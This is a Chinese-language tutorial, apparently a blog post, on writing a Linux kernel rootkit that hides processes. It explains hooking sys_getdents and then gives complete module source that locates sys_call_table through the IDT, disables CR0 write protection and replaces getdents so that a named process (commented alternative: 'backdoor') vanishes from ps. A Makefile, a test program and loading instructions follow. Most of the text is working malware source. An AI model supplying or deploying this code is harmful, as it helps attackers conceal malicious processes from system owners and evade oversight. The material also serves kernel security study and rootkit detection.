rootkit：实现隐藏进程

实现隐藏进程一般有两个方法：

1，把要隐藏的进程PID设置为0，因为系统默认是不显示PID为0的进程。

2，修改系统调用sys_getdents（）。

     Linux系统中用来查询文件信息的系统调用是sys_getdents，这一点可以通过strace来观察到，例如strace ls 将列出命令ls用到的系统调用，从中可以发现ls是通过getdents系统调用来操作的，对应于内核里的sys_getedents来执行。当查询文件或者目录的相关信息时，Linux系统用 sys_getedents来执行相应的查询操作，并把得到的信息传递给用户空间运行的程序，所以如果修改该系统调用，去掉结果中与某些特定文件的相关信 息，那么所有利用该系统调用的程序将看不见该文件，从而达到了隐藏的目的。首先介绍一下原来的系统调用，其原型为：
int sys_getdents(unsigned int fd, struct dirent *dirp,unsigned int count)
其中fd为指向目录文件的文件描述符，该函数根据fd所指向的目录文件读取相应dirent结构，并放入dirp中，其中count为dirp中返回的数据量，正确时该函数返回值为填充到dirp的字节数

下面是具体的实现代码：

hidep.c

/*
  进程隐藏程序
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <linux/dirent.h>//目录文件结构
#include <linux/string.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <asm/uaccess.h>
#include <linux/unistd.h>
#define CALLOFF 100
int orig_cr0;
char psname[10]="just";//需要隐藏的进程名
//char psname[10]="backdoor";
char *processname=psname;

//module_param(processname, charp, 0);
struct {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed)) idtr;//__attribute__ ((packed))不需要内存对齐的优化

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none,flags;
    unsigned short off2;
} __attribute__ ((packed)) * idt;

struct linux_dirent{//文件结构体
    unsigned long     d_ino;//索引节点号
    unsigned long     d_off;//在目录文件中的偏移
    unsigned short    d_reclen;//文件名长
    char    d_name[1];//文件名
};

void** sys_call_table;

unsigned int clear_and_return_cr0(void)//设置CR0，取消写保护位，因为在较新的内核中，sys_call_table的内存是只读的，
//所以要修改系统调用表就必须设置CR0
{
    unsigned int cr0 = 0;
    unsigned int ret;

    asm volatile ("movl %%cr0, %%eax"
            : "=a"(cr0)//eax到cr0
         );
    ret = cr0;//

    /*clear the 16th bit of CR0,*/
    cr0 &= 0xfffeffff;//设置CR0，第16位，WP（Write Protect）,它控制是否允许处理器向标志为只读属性的内存页写入数据,
    //0时表示禁用写保护功能
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(cr0)//输入，cr0到eax，eax到cr0
         );
    return ret;
}

void setback_cr0(unsigned int val)
{
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(val)//val值给eax，eax的值给CR0,恢复写保护位
         );
}


asmlinkage long (*orig_getdents)(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count);

char * findoffset(char *start)//遍历sys_call代码，查找sys_call_table的地址
{  //也可以通过cat /boot/System.map-`uname -r` |grep sys_call_table  查看当前sys_call_table地址
    char *p;
    for (p = start; p < start + CALLOFF; p++)
    if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')//寻找call指令
        return p;
    return NULL;
}

int myatoi(char *str)//字符串转整型
{
    int res = 0;
    int mul = 1;
    char *ptr;
    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
    {
        if (*ptr < '0' || *ptr > '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    if(res>0 && res< 9999)
        printk(KERN_INFO "pid=%d,",res);
    printk("\n");
    return (res);
}

struct task_struct *get_task(pid_t pid)//遍历进程双向循环链表，根据PID，查找需要隐藏的进程，并返回该进程控制块
{
    struct task_struct *p = get_current(),*entry=NULL;
    list_for_each_entry(entry,&(p->tasks),tasks)
    {
        if(entry->pid == pid)
        {
            printk("pid found=%d\n",entry->pid);
            return entry;
        }
        else
        {
    //    printk(KERN_INFO "pid=%d not found\n",pid);
        }
    }
    return NULL;
}

static inline char *get_name(struct task_struct *p, char *buf)//获取进程名
{
    int i;
    char *name;
    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;
        if (!c)
            break;
        if (c == '\\') {
            buf[1] = c;
            buf += 2;
            continue;
        }
        if (c == '\n')
        {
            buf[0] = '\\';
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    }
    while (i);
    *buf = '\n';
    return buf + 1;
}

int get_process(pid_t pid)//判断是否找到隐藏进程
{
    struct task_struct *task = get_task(pid);
    //    char *buffer[64] = {0};
    char buffer[64];
    if (task)
    {
        get_name(task, buffer);
    //    if(pid>0 && pid<9999)
    //    printk(KERN_INFO "task name=%s\n",*buffer);
        if(strstr(buffer,processname))
            return 1;
        else
            return 0;
    }
    else
        return 0;
}

asmlinkage long hacked_getdents(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count)//修改的系统调用，替换原来的sys_getdents
{
    //added by lsc for process
    long value;
    //    struct inode *dinode;
    unsigned short len = 0;
    unsigned short tlen = 0;
//    struct linux_dirent *mydir = NULL;
//end
    value = (*orig_getdents) (fd, dirp, count);//调用sys_getdents,返回该目录文件下目录的总字节数
    tlen = value;
    while(tlen > 0)
    {
        len = dirp->d_reclen;//当前遍历的目录的长度
        tlen = tlen - len;
        printk("%s\n",dirp->d_name);

        if(get_process(myatoi(dirp->d_name)) )
        {
            printk("find process\n");
            memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);//覆盖掉需要隐藏的进程
            value = value - len;
            printk(KERN_INFO "hide successful.\n");
        }
        if(tlen)
            dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);//移到后面一个目录，继续查找是否有其他同名的需要隐藏的进程
    }
    printk(KERN_INFO "finished hacked_getdents.\n");
    return value;
}


void **get_sct_addr(void)
{
    unsigned sys_call_off;
    unsigned sct = 0;
    char *p;
    asm("sidt %0":"=m"(idtr));//获取中断描述符表地址
    idt = (void *) (idtr.base + 8 * 0x80);//通过0x80中断找到system_call的服务例程描述符项，一个中断描述符8个字节
    sys_call_off = (idt->off2 << 16) | idt->off1;//找到对应的system_call代码地址
    if ((p = findoffset((char *) sys_call_off)))//找到sys_call_table的地址
        sct = *(unsigned *) (p + 3);
    return ((void **)sct);
}


static int filter_init(void)
{
    sys_call_table = get_sct_addr();
    if (!sys_call_table)
    {
        printk("get_act_addr(): NULL...\n");
        return 0;
    }
    else
        printk("sct: 0x%x\n", (unsigned int)sys_call_table);
    orig_getdents = sys_call_table[__NR_getdents];//保存原来的系统调用

    orig_cr0 = clear_and_return_cr0();//取消写保护位，并且返回原来的cr0
    sys_call_table[__NR_getdents] = hacked_getdents;//替换成我们自己写的系统调用
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module loaded.\n");
                return 0;
}


static void filter_exit(void)
{
    orig_cr0 = clear_and_return_cr0();
    if (sys_call_table)
    sys_call_table[__NR_getdents] = orig_getdents;//恢复默认的系统调用
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module removed\n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");

对应的makefile：

KERNELDIR=/usr/src/linux-headers-3.2.0-39-generic-pae
PWD:=$(shell pwd)
obj-m :=hidep.o
modules:
    $(MAKE) -C $(KERNELDIR) M=$(PWD) modules
clean:
    rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c *.order *.symvers

对应的测试程序，即要隐藏的进程: just.c

#include<stdio.h>
int main()
{
    while(1);
    return 0;
}

1,编译并在后台运行程序 just.c,会发现内核给just.c随机分配了一个PID

2，此时 用ps 命令，可以清楚看到 程序just的PID。

2,编译hidep.c 生成模块hide.ko

3,把模块hide.ko,用命令 insmod 加载进内核

4，再次 用 ps 命令，发现之前的PID被隐藏

5，最后不要忘了rmmod掉hidep.ko,当然重启后内核也会把它丢了，不过最好养成不用就卸载掉的习惯。